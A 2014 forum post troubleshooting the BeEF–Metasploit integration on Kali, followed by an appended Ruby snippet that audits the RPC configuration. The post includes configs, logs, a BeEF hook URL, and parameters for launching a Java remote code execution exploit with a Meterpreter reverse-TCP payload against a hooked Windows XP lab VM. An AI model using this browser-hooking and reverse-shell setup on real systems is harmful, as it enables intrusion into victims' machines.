BeEF and Metasploit on up-to-date Kali fresh install



riramar
2014-09-03, 13:06
Hi All,

I did a fresh install and update (apt-get update && apt-get upgrade) of Kali in a VirtualBox VM and tried to configure and use BeEF integrated with Metasploit.


root@kali:~# uname -a
Linux kali 3.14-kali1-amd64 #1 SMP Debian 3.14.5-1kali1 (2014-06-07) x86_64 GNU/Linux

Everything looks great but when I execute a Metasploit exploit from BeEF I cannot see any job created on Metasploit.
I've already seen some videos on the internet and I saw this working in an Ubuntu box.
I'll describe the steps that I'm doing below just to check if I'm doing it right.
First I configured BeEF following the BeEF Wiki page (https://github.com/beefproject/beef/wiki/Configuration), enabling the Metasploit extension in the BeEF configuration file:


root@kali:~# grep metasploit /etc/beef-xss/config.yaml -A 1
        metasploit:
            enable: true
root@kali:~#

After that I configured the Metasploit extension updating the parameters host and callback_host with my internal IP and setting the right path for os custom ({os: 'custom', path: '/usr/share/metasploit-framework/'}).


root@kali:~# cat /usr/share/beef-xss/extensions/metasploit/config.yaml
#
# Copyright (c) 2006-2014 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=10.211.55.2 Pass=abc123
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "10.0.2.7"
            port: 55552
            user: "msf"
            pass: "abc123"
            uri: '/api'
            # if you need "ssl: true" make sure you start msfrpcd with "SSL=y", like:
            # load msgrpc ServerHost=IP Pass=abc123 SSL=y
            ssl: false
            ssl_version: 'SSLv3'
            ssl_verify: true
            callback_host: "10.0.2.7"
            autopwn_url: "autopwn"
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
            msf_path: [
                {os: 'osx', path: '/opt/local/msf/'},
                {os: 'livecd', path: '/opt/metasploit-framework/'},
                {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
                {os: 'bt5', path: '/opt/framework3/msf3/'},
                {os: 'backbox', path: '/opt/metasploit3/msf3/'},
                {os: 'kali', path: '/usr/share/metasploit-framework/'},
                {os: 'pentoo', path: '/usr/lib/metasploit'},
                {os: 'win', path: 'c:\\metasploit-framework\\'},
                {os: 'custom', path: '/usr/share/metasploit-framework/'}
            ]
root@kali:~#

In order to start Metasploit, first I started the PostgreSQL database (service postgresql start) and after that I started Metasploit (service metasploit start).
With the services running I started msfconsole with some initial configuration (connect to DB, etc.) as you can see below:


root@kali:~# cat .msf4/msfconsole.rc
db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml
set ConsoleLogging true
set LogLevel 5
set SessionLogging true
set TimestampOutput true
spool /root/metasploit/metasploit.spool.txt
set PROMPT '%U@%H(%L) :'
root@kali:~# /usr/bin/msfconsole -r /root/.msf4/msfconsole.rc
...
=[ metasploit v4.10.0-2014082101 [core:4.10.0.pre.2014082101 api:1.0.0]]
+ -- --=[ 1331 exploits - 722 auxiliary - 214 post ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml
Rebuilding the module cache in the background...
resource (/root/.msf4/msfconsole.rc)> set ConsoleLogging true
Console logging is now enabled.
ConsoleLogging => true
resource (/root/.msf4/msfconsole.rc)> set LogLevel 5
LogLevel => 5
resource (/root/.msf4/msfconsole.rc)> set SessionLogging true
Session logging will be enabled for future sessions.
SessionLogging => true
resource (/root/.msf4/msfconsole.rc)> set TimestampOutput true
TimestampOutput => true
resource (/root/.msf4/msfconsole.rc)> spool /root/metasploit/metasploit.spool.txt
Spooling to file /root/metasploit/metasploit.spool.txt...
resource (/root/.msf4/msfconsole.rc)> set PROMPT '%U@%H(%L) :'
PROMPT => %U@%H(%L) :
root@kali(10.0.2.7) :>

For enabling RPC communication I started the msgrpc plugin. Of course, IP address, username and password are consistent with the configuration file:


root@kali(10.0.2.7) :> load msgrpc ServerHost=10.0.2.7 Pass=abc123
MSGRPC Service: 10.0.2.7:55552
MSGRPC Username: msf
MSGRPC Password: abc123
Successfully loaded plugin: msgrpc
root@kali(10.0.2.7) :>

Now it's time to run BeEF in another terminal.


root@kali:/usr/share/beef-xss# ./beef -x
[ 9:41:15] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[ 9:41:15] Browser Exploitation Framework (BeEF) 0.4.4.9-alpha
[ 9:41:15] | Twit: @beefproject
[ 9:41:15] | Site: http://beefproject.com
[ 9:41:15] | Blog: http://blog.beefproject.com
[ 9:41:15] |_ Wiki: https://github.com/beefproject/beef/wiki
[ 9:41:15] Project Creator: Wade Alcorn (@WadeAlcorn)
[ 9:41:15] Successful connection with Metasploit.
[ 9:41:18] Loaded 269 Metasploit exploits.
[ 9:41:18] Resetting the database for BeEF.
[ 9:41:18] BeEF is loading. Wait a few seconds...
[ 9:41:23] 11 extensions enabled.
[ 9:41:23] 464 modules enabled.
[ 9:41:23] 2 network interfaces were detected.
[ 9:41:23][+] running on network interface: 127.0.0.1
[ 9:41:23] | Hook URL: http://127.0.0.1:3000/hook.js
[ 9:41:23] |_ UI URL: http://127.0.0.1:3000/ui/panel
[ 9:41:23][+] running on network interface: 10.0.2.7
[ 9:41:23] | Hook URL: http://10.0.2.7:3000/hook.js
[ 9:41:23] |_ UI URL: http://10.0.2.7:3000/ui/panel
[ 9:41:23] RESTful API key: 571500b69782ad0a5f82f454aad7ee30022717ed
[ 9:41:23] HTTP Proxy: http://127.0.0.1:6789
[ 9:41:23] BeEF server started (press control+c to stop)

As you can see in "Successful connection with Metasploit" the connection with Metasploit is OK!
So I opened the BeEF panel in the Kali Iceweasel browser and logged in with beef/beef with no problem.
From another VirtualBox VM running Windows XP I accessed the demo page in order to hook it.
From the BeEF panel on Kali I could see the new hooked browser.
Since I already know that the Java CMM Remote Code Execution is working on this Windows XP, I ran this module on this host with the parameters below:


Java CMM Remote Code Execution
SSL: disabled
SRVHOST: 10.0.2.7
SRVPORT: 8080
URIPATH: 10660e6c
Payload: windows/meterpreter/reverse_tcp

In the terminal where I started BeEF I can see this:


[ 9:44:54] New Hooked Browser [id:1, ip:10.0.2.10, type:IE-7, os:Windows XP], hooked domain [10.0.2.7:3000]
[10:03:10] Hooked browser [id:1, ip:10.0.2.10] has been sent instructions from command module [id:1, name:'Java CMM Remote Code Execution']

But in the other terminal I cannot see any jobs on the msfconsole:


root@kali(10.0.2.7) :> jobs

Jobs
====

No active jobs.

root@kali(10.0.2.7) :>

If I use and run the exploit directly from msfconsole it works perfectly.

Does anyone have BeEF and Metasploit working in a fresh Kali install?

Thanks
Ricardo
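
Added example, not part of the original post or of BeEF: a Ruby check of the rule stated in the config comments above (ServerHost must equal host and callback_host, and "ssl: true" needs SSL=y), which also flags the weak RPC settings visible in the post. The helper names and the trimmed sample config are constructed for illustration; the check does not diagnose the missing job.

```ruby
require 'yaml'

# Constructed sample: the RPC-related keys of extensions/metasploit/config.yaml
# as posted above (msf_path and other keys omitted).
SAMPLE_CONFIG = <<~CONFIG
  beef:
    extension:
      metasploit:
        enable: true
        host: "10.0.2.7"
        port: 55552
        user: "msf"
        pass: "abc123"
        ssl: false
        ssl_version: 'SSLv3'
        callback_host: "10.0.2.7"
CONFIG

# The plugin line typed into msfconsole, as posted above.
SAMPLE_LOAD = 'load msgrpc ServerHost=10.0.2.7 Pass=abc123'

# Parse the Key=Value options of a "load msgrpc ..." line into a hash.
def msgrpc_options(line)
  line.scan(/(\w+)=(\S+)/).to_h
end

# Hypothetical helper (not a BeEF API): returns a list of finding strings.
def audit_msf_link(config_yaml, load_line)
  ext = YAML.safe_load(config_yaml).dig('beef', 'extension', 'metasploit') || {}
  opts = msgrpc_options(load_line)
  findings = []
  %w[host callback_host].each do |key|
    next if ext[key] == opts['ServerHost']
    findings << "mismatch: #{key}=#{ext[key]} but ServerHost=#{opts['ServerHost']}"
  end
  findings << 'mismatch: pass differs from msgrpc Pass' unless ext['pass'].to_s == opts['Pass']
  ssl_on = ext['ssl'] == true
  findings << 'mismatch: ssl setting and msgrpc SSL=y disagree' unless ssl_on == (opts['SSL'] == 'y')
  findings << 'weak: pass is the sample value from the config comments' if ext['pass'].to_s == 'abc123'
  findings << 'weak: ssl is false, RPC traffic including the login is not encrypted' unless ssl_on
  findings << 'weak: ssl_version SSLv3 is deprecated' if ssl_on && ext['ssl_version'] == 'SSLv3'
  findings << 'note: RPC listens on a non-loopback address' unless %w[127.0.0.1 localhost ::1].include?(opts['ServerHost'])
  findings
end
```

For the values posted above, audit_msf_link(SAMPLE_CONFIG, SAMPLE_LOAD) reports no mismatch, only the sample password, the unencrypted RPC link and the non-loopback listener.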